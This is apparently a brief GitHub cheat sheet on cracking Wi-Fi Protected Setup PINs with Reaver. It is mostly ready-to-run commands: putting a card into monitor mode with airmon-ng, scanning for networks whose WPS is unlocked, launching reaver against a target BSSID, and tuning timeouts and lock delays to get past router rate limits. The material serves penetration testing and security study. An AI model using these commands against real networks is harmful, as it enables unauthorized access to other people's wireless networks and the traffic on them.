You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
8 digits can be bruteforced - because 4 digits are checked separately
Access Point will mostly block connection after to many requests
Reaver needs the interface to be in monitor mode
airmon-ng check kill
airmon-ng start <interface>
All networks with WPS Lock options set to "no" can be attacked
airodump-ng <interface> --wps
Start brute force
reaver -i <interface> -b <bssid>
General information
default timeout value is 5 (minimum 1 second), change it with: -t <seconds>
default delay period between pin attempts is 1 second, change it with: -d <seconds>
AP will temporarily lock WPS state, reaver will wait 315 seconds, change the amount with: --lock-delay=<seconds>
if AP does not send an EAP FAIL message, force the response with: --eap-terminate